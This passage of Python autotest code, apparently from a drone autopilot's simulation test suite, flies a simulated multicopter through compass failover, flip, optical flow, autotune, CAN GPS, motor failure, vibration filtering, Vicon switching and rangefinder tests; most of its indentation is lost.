while self.get_sim_time_cached() < tstart + holdtime:
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
self.progress("heading %d" % m.heading)
self.progress("CIRCLE OK for %u seconds" % holdtime)
self.do_RTL()
# test_mag_fail - test failover of compass in EKF
def test_mag_fail(self):
# we want both EK2 and EK3
self.set_parameter("EK2_ENABLE", 1)
self.set_parameter("EK3_ENABLE", 1)
self.takeoff(10, mode="LOITER")
self.change_mode('CIRCLE')
self.delay_sim_time(20)
self.context_collect("STATUSTEXT")
self.progress("Failing first compass")
self.set_parameter("SIM_MAG1_FAIL", 1)
        # we wait for the message twice, once for EK2 and again for EK3
self.wait_statustext("EKF2 IMU0 switching to compass 1", check_context=True)
self.wait_statustext("EKF3 IMU0 switching to compass 1", check_context=True)
self.progress("compass switch 1 OK")
self.delay_sim_time(2)
self.context_clear_collection("STATUSTEXT")
self.progress("Failing 2nd compass")
self.set_parameter("SIM_MAG2_FAIL", 1)
self.wait_statustext("EKF2 IMU0 switching to compass 2", check_context=True)
self.wait_statustext("EKF3 IMU0 switching to compass 2", check_context=True)
self.progress("compass switch 2 OK")
self.delay_sim_time(2)
self.context_clear_collection("STATUSTEXT")
self.progress("Failing 3rd compass")
self.set_parameter("SIM_MAG3_FAIL", 1)
self.delay_sim_time(2)
self.set_parameter("SIM_MAG1_FAIL", 0)
self.wait_statustext("EKF2 IMU0 switching to compass 0", check_context=True)
self.wait_statustext("EKF3 IMU0 switching to compass 0", check_context=True)
self.progress("compass switch 0 OK")
self.do_RTL()
def wait_attitude(self, desroll=None, despitch=None, timeout=2, tolerance=10):
'''wait for an attitude (degrees)'''
if desroll is None and despitch is None:
raise ValueError("despitch or desroll must be supplied")
tstart = self.get_sim_time()
while True:
            if self.get_sim_time_cached() - tstart > timeout:
raise AutoTestTimeoutException("Failed to achieve attitude")
m = self.mav.recv_match(type='ATTITUDE', blocking=True)
roll_deg = math.degrees(m.roll)
pitch_deg = math.degrees(m.pitch)
self.progress("wait_att: roll=%f desroll=%s pitch=%f despitch=%s" %
(roll_deg, desroll, pitch_deg, despitch))
if desroll is not None and abs(roll_deg - desroll) > tolerance:
continue
if despitch is not None and abs(pitch_deg - despitch) > tolerance:
continue
return
def fly_flip(self):
ex = None
try:
self.set_message_rate_hz(mavutil.mavlink.MAVLINK_MSG_ID_ATTITUDE, 100)
self.takeoff(20)
self.hover()
old_speedup = self.get_parameter("SIM_SPEEDUP")
self.set_parameter('SIM_SPEEDUP', 1)
self.progress("Flipping in roll")
self.set_rc(1, 1700)
self.send_cmd_do_set_mode('FLIP') # don't wait for success
self.wait_attitude(despitch=0, desroll=45, tolerance=30)
self.wait_attitude(despitch=0, desroll=90, tolerance=30)
self.wait_attitude(despitch=0, desroll=-45, tolerance=30)
self.progress("Waiting for level")
self.set_rc(1, 1500) # can't change quickly enough!
self.wait_attitude(despitch=0, desroll=0, tolerance=5)
self.progress("Regaining altitude")
self.change_mode('ALT_HOLD')
self.wait_for_alt(20, max_err=40)
self.progress("Flipping in pitch")
self.set_rc(2, 1700)
self.send_cmd_do_set_mode('FLIP') # don't wait for success
self.wait_attitude(despitch=45, desroll=0, tolerance=30)
# can't check roll here as it flips from 0 to -180..
self.wait_attitude(despitch=90, tolerance=30)
self.wait_attitude(despitch=-45, tolerance=30)
self.progress("Waiting for level")
self.set_rc(2, 1500) # can't change quickly enough!
self.wait_attitude(despitch=0, desroll=0, tolerance=5)
self.set_parameter('SIM_SPEEDUP', old_speedup)
self.do_RTL()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.set_message_rate_hz(mavutil.mavlink.MAVLINK_MSG_ID_ATTITUDE, 0)
if ex is not None:
raise ex
# fly_optical_flow_limits - test EKF navigation limiting
def fly_optical_flow_limits(self):
ex = None
self.context_push()
try:
self.set_parameter("SIM_FLOW_ENABLE", 1)
self.set_parameter("FLOW_TYPE", 10)
# configure EKF to use optical flow instead of GPS
ahrs_ekf_type = self.get_parameter("AHRS_EKF_TYPE")
if ahrs_ekf_type == 2:
self.set_parameter("EK2_GPS_TYPE", 3)
if ahrs_ekf_type == 3:
self.set_parameter("EK3_SRC1_POSXY", 0)
self.set_parameter("EK3_SRC1_VELXY", 5)
self.set_parameter("EK3_SRC1_VELZ", 0)
self.set_analog_rangefinder_parameters()
self.set_parameter("SIM_GPS_DISABLE", 1)
self.set_parameter("SIM_TERRAIN", 0)
self.reboot_sitl()
# we can't takeoff in loiter as we need flow healthy
self.takeoff(alt_min=5, mode='ALT_HOLD', require_absolute=False, takeoff_throttle=1800)
self.change_mode('LOITER')
            # horizontal speed should be limited by the EKF optical-flow limits
self.set_rc(2, 1000)
tstart = self.get_sim_time()
timeout = 60
started_climb = False
while self.get_sim_time_cached() - tstart < timeout:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
spd = math.sqrt(m.vx**2 + m.vy**2) * 0.01
alt = m.relative_alt*0.001
# calculate max speed from altitude above the ground
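                # when navigating on optical flow alone the EKF limits
                # horizontal speed roughly in proportion to height above
                # ground (the flow sensor's angular rate saturates), so
                # allow ~1.5 * alt plus a small margin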
margin = 2.0
max_speed = alt * 1.5 + margin
self.progress("%0.1f: Low Speed: %f (want <= %u) alt=%.1f" %
(self.get_sim_time_cached() - tstart,
spd,
max_speed, alt))
if spd > max_speed:
raise NotAchievedException(("Speed should be limited by"
"EKF optical flow limits"))
# after 30 seconds start climbing
if not started_climb and self.get_sim_time_cached() - tstart > 30:
started_climb = True
self.set_rc(3, 1900)
self.progress("Moving higher")
# check altitude is not climbing above 35m
if alt > 35:
raise NotAchievedException("Alt should be limited by EKF optical flow limits")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.set_rc(2, 1500)
self.context_pop()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_autotune(self):
"""Test autotune mode"""
rlld = self.get_parameter("ATC_RAT_RLL_D")
rlli = self.get_parameter("ATC_RAT_RLL_I")
rllp = self.get_parameter("ATC_RAT_RLL_P")
self.takeoff(10)
# hold position in loiter
self.change_mode('AUTOTUNE')
tstart = self.get_sim_time()
sim_time_expected = 5000
deadline = tstart + sim_time_expected
while self.get_sim_time_cached() < deadline:
now = self.get_sim_time_cached()
m = self.mav.recv_match(type='STATUSTEXT',
blocking=True,
timeout=1)
if m is None:
continue
self.progress("STATUSTEXT (%u<%u): %s" % (now, deadline, m.text))
if "AutoTune: Success" in m.text:
self.progress("AUTOTUNE OK (%u seconds)" % (now - tstart))
# near enough for now:
self.change_mode('LAND')
self.wait_landed_and_disarmed()
# check the original gains have been re-instated
if (rlld != self.get_parameter("ATC_RAT_RLL_D") or
rlli != self.get_parameter("ATC_RAT_RLL_I") or
rllp != self.get_parameter("ATC_RAT_RLL_P")):
raise NotAchievedException("AUTOTUNE gains still present")
return
raise NotAchievedException("AUTOTUNE failed (%u seconds)" %
(self.get_sim_time() - tstart))
def fly_autotune_switch(self):
"""Test autotune on a switch with gains being saved"""
# autotune changes a set of parameters on the vehicle which
# are not in our context. That changes the flight
        # characteristics, which we can't afford between runs. So
# completely reset the simulated vehicle after the run is
# complete by "customising" the commandline here:
self.customise_SITL_commandline([])
self.context_push()
ex = None
try:
self.fly_autotune_switch_body()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def fly_autotune_switch_body(self):
self.set_parameter("RC8_OPTION", 17)
self.set_parameter("ATC_RAT_RLL_FLTT", 20)
rlld = self.get_parameter("ATC_RAT_RLL_D")
rlli = self.get_parameter("ATC_RAT_RLL_I")
rllp = self.get_parameter("ATC_RAT_RLL_P")
rllt = self.get_parameter("ATC_RAT_RLL_FLTT")
self.progress("AUTOTUNE pre-gains are P:%f I:%f D:%f" %
(self.get_parameter("ATC_RAT_RLL_P"),
self.get_parameter("ATC_RAT_RLL_I"),
self.get_parameter("ATC_RAT_RLL_D")))
self.takeoff(10, mode='LOITER')
# hold position in loiter and run autotune
self.set_rc(8, 1850)
self.wait_mode('AUTOTUNE')
tstart = self.get_sim_time()
sim_time_expected = 5000
deadline = tstart + sim_time_expected
while self.get_sim_time_cached() < deadline:
now = self.get_sim_time_cached()
m = self.mav.recv_match(type='STATUSTEXT',
blocking=True,
timeout=1)
if m is None:
continue
self.progress("STATUSTEXT (%u<%u): %s" % (now, deadline, m.text))
if "AutoTune: Success" in m.text:
self.progress("AUTOTUNE OK (%u seconds)" % (now - tstart))
# Check original gains are re-instated
self.set_rc(8, 1100)
self.delay_sim_time(1)
self.progress("AUTOTUNE original gains are P:%f I:%f D:%f" %
(self.get_parameter("ATC_RAT_RLL_P"), self.get_parameter("ATC_RAT_RLL_I"),
self.get_parameter("ATC_RAT_RLL_D")))
if (rlld != self.get_parameter("ATC_RAT_RLL_D") or
rlli != self.get_parameter("ATC_RAT_RLL_I") or
rllp != self.get_parameter("ATC_RAT_RLL_P")):
raise NotAchievedException("AUTOTUNE gains still present")
# Use autotuned gains
self.set_rc(8, 1850)
self.delay_sim_time(1)
self.progress("AUTOTUNE testing gains are P:%f I:%f D:%f" %
(self.get_parameter("ATC_RAT_RLL_P"), self.get_parameter("ATC_RAT_RLL_I"),
self.get_parameter("ATC_RAT_RLL_D")))
if (rlld == self.get_parameter("ATC_RAT_RLL_D") or
rlli == self.get_parameter("ATC_RAT_RLL_I") or
rllp == self.get_parameter("ATC_RAT_RLL_P")):
raise NotAchievedException("AUTOTUNE gains not present in pilot testing")
# land without changing mode
self.set_rc(3, 1000)
self.wait_for_alt(0)
self.wait_disarmed()
# Check gains are still there after disarm
if (rlld == self.get_parameter("ATC_RAT_RLL_D") or
rlli == self.get_parameter("ATC_RAT_RLL_I") or
rllp == self.get_parameter("ATC_RAT_RLL_P")):
raise NotAchievedException("AUTOTUNE gains not present on disarm")
self.reboot_sitl()
# Check gains are still there after reboot
if (rlld == self.get_parameter("ATC_RAT_RLL_D") or
rlli == self.get_parameter("ATC_RAT_RLL_I") or
rllp == self.get_parameter("ATC_RAT_RLL_P")):
raise NotAchievedException("AUTOTUNE gains not present on reboot")
# Check FLTT is unchanged
if rllt != self.get_parameter("ATC_RAT_RLL_FLTT"):
raise NotAchievedException("AUTOTUNE FLTT was modified")
return
raise NotAchievedException("AUTOTUNE failed (%u seconds)" %
(self.get_sim_time() - tstart))
# fly_auto_test - fly mission which tests a significant number of commands
def fly_auto_test(self):
# Fly mission #1
self.progress("# Load copter_mission")
# load the waypoint count
num_wp = self.load_mission("copter_mission.txt", strict=False)
if not num_wp:
raise NotAchievedException("load copter_mission failed")
self.progress("test: Fly a mission from 1 to %u" % num_wp)
self.set_current_waypoint(1)
self.change_mode("LOITER")
self.wait_ready_to_arm()
self.arm_vehicle()
# switch into AUTO mode and raise throttle
self.change_mode("AUTO")
self.set_rc(3, 1500)
# fly the mission
self.wait_waypoint(0, num_wp-1, timeout=500)
# set throttle to minimum
self.zero_throttle()
# wait for disarm
self.wait_disarmed()
self.progress("MOTORS DISARMED OK")
self.progress("Auto mission completed: passed!")
# fly_auto_test using CAN GPS - fly mission which tests normal operation alongside CAN GPS
def fly_auto_test_using_can_gps(self):
self.set_parameter("CAN_P1_DRIVER", 1)
self.set_parameter("GPS_TYPE", 9)
self.set_parameter("GPS_TYPE2", 9)
self.set_parameter("SIM_GPS2_DISABLE", 0)
self.context_push()
self.set_parameter("ARMING_CHECK", 1 << 3)
self.context_collect('STATUSTEXT')
self.reboot_sitl()
        # Test that UAVCAN GPS ordering works
gps1_det_text = self.wait_text("GPS 1: specified as UAVCAN.*", regex=True, check_context=True)
gps2_det_text = self.wait_text("GPS 2: specified as UAVCAN.*", regex=True, check_context=True)
gps1_nodeid = int(gps1_det_text.split('-')[1])
gps2_nodeid = int(gps2_det_text.split('-')[1])
if gps1_nodeid is None or gps2_nodeid is None:
raise NotAchievedException("GPS not ordered per the order of Node IDs")
self.context_stop_collecting('STATUSTEXT')
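        # Each case is [GPS1_CAN_OVRIDE, GPS2_CAN_OVRIDE, node id we
        # expect to be detected as GPS 1, node id we expect as GPS 2,
        # expected arming-failure statustext ('' if arming should be
        # allowed)]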
GPS_Order_Tests = [[gps2_nodeid, gps2_nodeid, gps2_nodeid, 0,
"PreArm: Same Node Id {} set for multiple GPS".format(gps2_nodeid)],
[gps1_nodeid, int(gps2_nodeid/2), gps1_nodeid, 0,
"Selected GPS Node {} not set as instance {}".format(int(gps2_nodeid/2), 2)],
[int(gps1_nodeid/2), gps2_nodeid, 0, gps2_nodeid,
"Selected GPS Node {} not set as instance {}".format(int(gps1_nodeid/2), 1)],
[gps1_nodeid, gps2_nodeid, gps1_nodeid, gps2_nodeid, ""],
[gps2_nodeid, gps1_nodeid, gps2_nodeid, gps1_nodeid, ""],
[gps1_nodeid, 0, gps1_nodeid, gps2_nodeid, ""],
[0, gps2_nodeid, gps1_nodeid, gps2_nodeid, ""]]
for case in GPS_Order_Tests:
self.progress("############################### Trying Case: " + str(case))
self.set_parameter("GPS1_CAN_OVRIDE", case[0])
self.set_parameter("GPS2_CAN_OVRIDE", case[1])
self.drain_mav()
self.context_collect('STATUSTEXT')
self.reboot_sitl()
gps1_det_text = None
gps2_det_text = None
try:
gps1_det_text = self.wait_text("GPS 1: specified as UAVCAN.*", regex=True, check_context=True)
except AutoTestTimeoutException:
pass
try:
gps2_det_text = self.wait_text("GPS 2: specified as UAVCAN.*", regex=True, check_context=True)
except AutoTestTimeoutException:
pass
self.context_stop_collecting('STATUSTEXT')
self.change_mode('LOITER')
if case[2] == 0 and case[3] == 0:
if gps1_det_text or gps2_det_text:
raise NotAchievedException("Failed ordering for requested CASE:", case)
if case[2] == 0 or case[3] == 0:
if bool(gps1_det_text is not None) == bool(gps2_det_text is not None):
print(gps1_det_text)
print(gps2_det_text)
raise NotAchievedException("Failed ordering for requested CASE:", case)
if gps1_det_text:
if case[2] != int(gps1_det_text.split('-')[1]):
raise NotAchievedException("Failed ordering for requested CASE:", case)
if gps2_det_text:
if case[3] != int(gps2_det_text.split('-')[1]):
raise NotAchievedException("Failed ordering for requested CASE:", case)
if len(case[4]):
self.context_collect('STATUSTEXT')
self.run_cmd(mavutil.mavlink.MAV_CMD_COMPONENT_ARM_DISARM,
1, # ARM
0,
0,
0,
0,
0,
0,
timeout=10,
want_result=mavutil.mavlink.MAV_RESULT_FAILED)
self.wait_statustext(case[4], check_context=True)
self.context_stop_collecting('STATUSTEXT')
self.progress("############################### All GPS Order Cases Tests Passed")
self.context_pop()
self.fly_auto_test()
def fly_motor_fail(self, fail_servo=0, fail_mul=0.0, holdtime=30):
"""Test flight with reduced motor efficiency"""
# we only expect an octocopter to survive ATM:
servo_counts = {
# 2: 6, # hexa
3: 8, # octa
# 5: 6, # Y6
}
frame_class = int(self.get_parameter("FRAME_CLASS"))
if frame_class not in servo_counts:
self.progress("Test not relevant for frame_class %u" % frame_class)
return
servo_count = servo_counts[frame_class]
if fail_servo < 0 or fail_servo > servo_count:
raise ValueError('fail_servo outside range for frame class')
self.takeoff(10, mode="LOITER")
self.change_alt(alt_min=50)
# Get initial values
start_hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
start_attitude = self.mav.recv_match(type='ATTITUDE', blocking=True)
hover_time = 5
try:
tstart = self.get_sim_time()
int_error_alt = 0
int_error_yaw_rate = 0
int_error_yaw = 0
self.progress("Hovering for %u seconds" % hover_time)
failed = False
while True:
now = self.get_sim_time_cached()
if now - tstart > holdtime + hover_time:
break
servo = self.mav.recv_match(type='SERVO_OUTPUT_RAW',
blocking=True)
hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
attitude = self.mav.recv_match(type='ATTITUDE', blocking=True)
if not failed and now - tstart > hover_time:
self.progress("Killing motor %u (%u%%)" %
(fail_servo+1, fail_mul))
self.set_parameter("SIM_ENGINE_FAIL", fail_servo)
self.set_parameter("SIM_ENGINE_MUL", fail_mul)
failed = True
if failed:
self.progress("Hold Time: %f/%f" % (now-tstart, holdtime))
servo_pwm = [servo.servo1_raw,
servo.servo2_raw,
servo.servo3_raw,
servo.servo4_raw,
servo.servo5_raw,
servo.servo6_raw,
servo.servo7_raw,
servo.servo8_raw]
self.progress("PWM output per motor")
for i, pwm in enumerate(servo_pwm[0:servo_count]):
if pwm > 1900:
state = "oversaturated"
elif pwm < 1200:
state = "undersaturated"
else:
state = "OK"
if failed and i == fail_servo:
state += " (failed)"
self.progress("servo %u [pwm=%u] [%s]" % (i+1, pwm, state))
alt_delta = hud.alt - start_hud.alt
yawrate_delta = attitude.yawspeed - start_attitude.yawspeed
yaw_delta = attitude.yaw - start_attitude.yaw
self.progress("Alt=%fm (delta=%fm)" % (hud.alt, alt_delta))
self.progress("Yaw rate=%f (delta=%f) (rad/s)" %
(attitude.yawspeed, yawrate_delta))
self.progress("Yaw=%f (delta=%f) (deg)" %
(attitude.yaw, yaw_delta))
dt = self.get_sim_time() - now
int_error_alt += abs(alt_delta/dt)
int_error_yaw_rate += abs(yawrate_delta/dt)
int_error_yaw += abs(yaw_delta/dt)
self.progress("## Error Integration ##")
self.progress(" Altitude: %fm" % int_error_alt)
self.progress(" Yaw rate: %f rad/s" % int_error_yaw_rate)
self.progress(" Yaw: %f deg" % int_error_yaw)
self.progress("----")
if int_error_yaw_rate > 0.1:
raise NotAchievedException("Vehicle is spinning")
if alt_delta < -20:
raise NotAchievedException("Vehicle is descending")
self.set_parameter("SIM_ENGINE_FAIL", 0)
self.set_parameter("SIM_ENGINE_MUL", 1.0)
except Exception as e:
self.set_parameter("SIM_ENGINE_FAIL", 0)
self.set_parameter("SIM_ENGINE_MUL", 1.0)
raise e
self.do_RTL()
def fly_motor_vibration(self):
"""Test flight with motor vibration"""
self.context_push()
ex = None
try:
self.set_rc_default()
# magic tridge EKF type that dramatically speeds up the test
self.set_parameters({
"AHRS_EKF_TYPE": 10,
"INS_LOG_BAT_MASK": 3,
"INS_LOG_BAT_OPT": 0,
"LOG_BITMASK": 958,
"LOG_DISARMED": 0,
"SIM_VIB_MOT_MAX": 350,
# these are real values taken from a 180mm Quad:
"SIM_GYR1_RND": 20,
"SIM_ACC1_RND": 5,
"SIM_ACC2_RND": 5,
"SIM_INS_THR_MIN": 0.1,
})
self.reboot_sitl()
self.takeoff(15, mode="ALT_HOLD")
hover_time = 15
tstart = self.get_sim_time()
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
tend = self.get_sim_time()
# if we don't reduce vibes here then the landing detector
# may not trigger
self.set_parameter("SIM_VIB_MOT_MAX", 0)
self.do_RTL()
psd = self.mavfft_fttd(1, 0, tstart * 1.0e6, tend * 1.0e6)
# ignore the first 20Hz and look for a peak at -15dB or more
ignore_bins = 20
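            # with the batch-sampler defaults (1024-point FFT at ~1kHz sample
            # rate) each bin is roughly 1Hz, so skipping 20 bins skips ~20Hz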
freq = psd["F"][numpy.argmax(psd["X"][ignore_bins:]) + ignore_bins]
if numpy.amax(psd["X"][ignore_bins:]) < -15 or freq < 180 or freq > 300:
raise NotAchievedException(
"Did not detect a motor peak, found %f at %f dB" %
(freq, numpy.amax(psd["X"][ignore_bins:])))
else:
self.progress("Detected motor peak at %fHz" % freq)
            # now add a static notch and check that, post-filter, the peak is
            # squashed (we require it to fall below -23dB)
self.set_parameters({
"INS_LOG_BAT_OPT": 2,
"INS_NOTCH_ENABLE": 1,
"INS_NOTCH_FREQ": freq,
"INS_NOTCH_ATT": 50,
"INS_NOTCH_BW": freq/2,
"SIM_VIB_MOT_MAX": 350,
})
self.reboot_sitl()
self.takeoff(15, mode="ALT_HOLD")
tstart = self.get_sim_time()
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
tend = self.get_sim_time()
self.set_parameter("SIM_VIB_MOT_MAX", 0)
self.do_RTL()
psd = self.mavfft_fttd(1, 0, tstart * 1.0e6, tend * 1.0e6)
freq = psd["F"][numpy.argmax(psd["X"][ignore_bins:]) + ignore_bins]
peakdB = numpy.amax(psd["X"][ignore_bins:])
if peakdB < -23:
self.progress("Did not detect a motor peak, found %f at %f dB" % (freq, peakdB))
else:
raise NotAchievedException("Detected peak %.1f Hz %.2f dB" % (freq, peakdB))
except Exception as e:
self.print_exception_caught(e)
ex = e
self.disarm_vehicle(force=True)
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def fly_vision_position(self):
"""Disable GPS navigation, enable Vicon input."""
# scribble down a location we can set origin to:
self.customise_SITL_commandline(["--uartF=sim:vicon:"])
self.progress("Waiting for location")
self.change_mode('LOITER')
self.wait_ready_to_arm()
old_pos = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
print("old_pos=%s" % str(old_pos))
self.context_push()
ex = None
try:
# configure EKF to use external nav instead of GPS
ahrs_ekf_type = self.get_parameter("AHRS_EKF_TYPE")
if ahrs_ekf_type == 2:
self.set_parameter("EK2_GPS_TYPE", 3)
if ahrs_ekf_type == 3:
self.set_parameter("EK3_SRC1_POSXY", 6)
self.set_parameter("EK3_SRC1_VELXY", 6)
self.set_parameter("EK3_SRC1_POSZ", 6)
self.set_parameter("EK3_SRC1_VELZ", 6)
self.set_parameter("GPS_TYPE", 0)
self.set_parameter("VISO_TYPE", 1)
self.set_parameter("SERIAL5_PROTOCOL", 1)
self.reboot_sitl()
# without a GPS or some sort of external prompting, AP
# doesn't send system_time messages. So prompt it:
self.mav.mav.system_time_send(int(time.time() * 1000000), 0)
self.progress("Waiting for non-zero-lat")
tstart = self.get_sim_time()
while True:
self.mav.mav.set_gps_global_origin_send(1,
old_pos.lat,
old_pos.lon,
old_pos.alt)
gpi = self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
self.progress("gpi=%s" % str(gpi))
if gpi.lat != 0:
break
if self.get_sim_time_cached() - tstart > 60:
raise AutoTestTimeoutException("Did not get non-zero lat")
self.takeoff()
self.set_rc(1, 1600)
tstart = self.get_sim_time()
while True:
vicon_pos = self.mav.recv_match(type='VISION_POSITION_ESTIMATE',
blocking=True)
# print("vpe=%s" % str(vicon_pos))
self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
# self.progress("gpi=%s" % str(gpi))
if vicon_pos.x > 40:
break
if self.get_sim_time_cached() - tstart > 100:
raise AutoTestTimeoutException("Vicon showed no movement")
# recenter controls:
self.set_rc(1, 1500)
self.progress("# Enter RTL")
self.change_mode('RTL')
self.set_rc(3, 1500)
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 200:
raise NotAchievedException("Did not disarm")
self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
# print("gpi=%s" % str(gpi))
self.mav.recv_match(type='SIMSTATE',
blocking=True)
# print("ss=%s" % str(ss))
# wait for RTL disarm:
if not self.armed():
break
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.zero_throttle()
self.reboot_sitl()
if ex is not None:
raise ex
def fly_gps_vicon_switching(self):
"""Fly GPS and Vicon switching test"""
self.customise_SITL_commandline(["--uartF=sim:vicon:"])
"""Setup parameters including switching to EKF3"""
self.context_push()
ex = None
try:
self.set_parameters({
"VISO_TYPE": 2, # enable vicon
"SERIAL5_PROTOCOL": 2,
"EK3_ENABLE": 1,
"EK3_SRC2_POSXY": 6, # External Nav
"EK3_SRC2_POSZ": 6, # External Nav
"EK3_SRC2_VELXY": 6, # External Nav
"EK3_SRC2_VELZ": 6, # External Nav
"EK3_SRC2_YAW": 6, # External Nav
"RC7_OPTION": 80, # RC aux switch 7 set to Viso Align
"RC8_OPTION": 90, # RC aux switch 8 set to EKF source selector
"EK2_ENABLE": 0,
"AHRS_EKF_TYPE": 3,
})
self.reboot_sitl()
# switch to use GPS
self.set_rc(8, 1000)
# ensure we can get a global position:
self.poll_home_position(timeout=120)
# record starting position
old_pos = self.get_global_position_int()
print("old_pos=%s" % str(old_pos))
# align vicon yaw with ahrs heading
self.set_rc(7, 2000)
# takeoff to 10m in Loiter
self.progress("Moving to ensure location is tracked")
self.takeoff(10, mode="LOITER", require_absolute=True, timeout=720)
# fly forward in Loiter
self.set_rc(2, 1300)
# disable vicon
self.set_parameter("SIM_VICON_FAIL", 1)
            # ensure the vehicle remains in Loiter for 15 seconds
tstart = self.get_sim_time()
while self.get_sim_time() - tstart < 15:
if not self.mode_is('LOITER'):
raise NotAchievedException("Expected to stay in loiter for >15 seconds")
# re-enable vicon
self.set_parameter("SIM_VICON_FAIL", 0)
# switch to vicon, disable GPS and wait 10sec to ensure vehicle remains in Loiter
self.set_rc(8, 1500)
self.set_parameter("GPS_TYPE", 0)
            # ensure the vehicle remains in Loiter for 15 seconds
tstart = self.get_sim_time()
while self.get_sim_time() - tstart < 15:
if not self.mode_is('LOITER'):
raise NotAchievedException("Expected to stay in loiter for >15 seconds")
# RTL and check vehicle arrives within 10m of home
self.set_rc(2, 1500)
self.do_RTL()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_rtl_speed(self):
"""Test RTL Speed parameters"""
rtl_speed_ms = 7
wpnav_speed_ms = 4
wpnav_accel_mss = 3
tolerance = 0.5
self.load_mission("copter_rtl_speed.txt")
self.set_parameter('WPNAV_ACCEL', wpnav_accel_mss * 100)
self.set_parameter('RTL_SPEED', rtl_speed_ms * 100)
self.set_parameter('WPNAV_SPEED', wpnav_speed_ms * 100)
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1600)
self.wait_altitude(19, 25, relative=True)
self.wait_groundspeed(wpnav_speed_ms-tolerance, wpnav_speed_ms+tolerance)
self.monitor_groundspeed(wpnav_speed_ms, timeout=20)
self.change_mode('RTL')
self.wait_groundspeed(rtl_speed_ms-tolerance, rtl_speed_ms+tolerance)
self.monitor_groundspeed(rtl_speed_ms, timeout=5)
self.change_mode('AUTO')
self.wait_groundspeed(0-tolerance, 0+tolerance)
self.wait_groundspeed(wpnav_speed_ms-tolerance, wpnav_speed_ms+tolerance)
self.monitor_groundspeed(wpnav_speed_ms, tolerance=0.6, timeout=5)
self.do_RTL()
def fly_nav_delay(self):
"""Fly a simple mission that has a delay in it."""
self.load_mission("copter_nav_delay.txt")
self.set_parameter("DISARM_DELAY", 0)
self.change_mode("LOITER")
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode("AUTO")
self.set_rc(3, 1600)
count_start = -1
count_stop = -1
tstart = self.get_sim_time()
last_mission_current_msg = 0
last_seq = None
while self.armed(): # we RTL at end of mission
now = self.get_sim_time_cached()
if now - tstart > 200:
raise AutoTestTimeoutException("Did not disarm as expected")
m = self.mav.recv_match(type='MISSION_CURRENT', blocking=True)
at_delay_item = ""
if m.seq == 3:
at_delay_item = "(At delay item)"
if count_start == -1:
count_start = now
if ((now - last_mission_current_msg) > 1 or m.seq != last_seq):
dist = None
x = self.mav.messages.get("NAV_CONTROLLER_OUTPUT", None)
if x is not None:
dist = x.wp_dist
self.progress("MISSION_CURRENT.seq=%u dist=%s %s" %
(m.seq, dist, at_delay_item))
last_mission_current_msg = self.get_sim_time_cached()
last_seq = m.seq
if m.seq > 3:
if count_stop == -1:
count_stop = now
calculated_delay = count_stop - count_start
want_delay = 59 # should reflect what's in the mission file
self.progress("Stopped for %u seconds (want >=%u seconds)" %
(calculated_delay, want_delay))
if calculated_delay < want_delay:
raise NotAchievedException("Did not delay for long enough")
def test_rangefinder(self):
ex = None
self.context_push()
self.progress("Making sure we don't ordinarily get RANGEFINDER")
m = self.mav.recv_match(type='RANGEFINDER',
blocking=True,
timeout=5)
if m is not None:
raise NotAchievedException("Received unexpected RANGEFINDER msg")
# may need to force a rotation if some other test has used the
# rangefinder...
self.progress("Ensure no RFND messages in log")
self.set_parameter("LOG_DISARMED", 1)
if self.current_onboard_log_contains_message("RFND"):
raise NotAchievedException("Found unexpected RFND message")
try:
self.set_analog_rangefinder_parameters()
self.set_parameter("RC9_OPTION", 10) # rangefinder
self.set_rc(9, 2000)
self.reboot_sitl()
self.progress("Making sure we now get RANGEFINDER messages")
m = self.mav.recv_match(type='RANGEFINDER',
blocking=True,
timeout=10)
if m is None:
raise NotAchievedException("Did not get expected RANGEFINDER msg")
self.progress("Checking RangeFinder is marked as enabled in mavlink")
m = self.mav.recv_match(type='SYS_STATUS',
blocking=True,
timeout=10)
flags = m.onboard_control_sensors_enabled
if not flags & mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION:
raise NotAchievedException("Laser not enabled in SYS_STATUS")
self.progress("Disabling laser using switch")
self.set_rc(9, 1000)
self.delay_sim_time(1)
self.progress("Checking RangeFinder is marked as disabled in mavlink")
m = self.mav.recv_match(type='SYS_STATUS',
blocking=True,
timeout=10)
flags = m.onboard_control_sensors_enabled
if flags & mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION:
raise NotAchievedException("Laser enabled in SYS_STATUS")
self.progress("Re-enabling rangefinder")
self.set_rc(9, 2000)
self.delay_sim_time(1)
m = self.mav.recv_match(type='SYS_STATUS',
blocking=True,
timeout=10)
flags = m.onboard_control_sensors_enabled
if not flags & mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION:
raise NotAchievedException("Laser not enabled in SYS_STATUS")
self.takeoff(10, mode="LOITER")
m_r = self.mav.recv_match(type='RANGEFINDER',
blocking=True)
m_p = self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
if abs(m_r.distance - m_p.relative_alt/1000) > 1:
raise NotAchievedException(
"rangefinder/global position int mismatch %0.2f vs %0.2f" %
(m_r.distance, m_p.relative_alt/1000))
self.land_and_disarm()
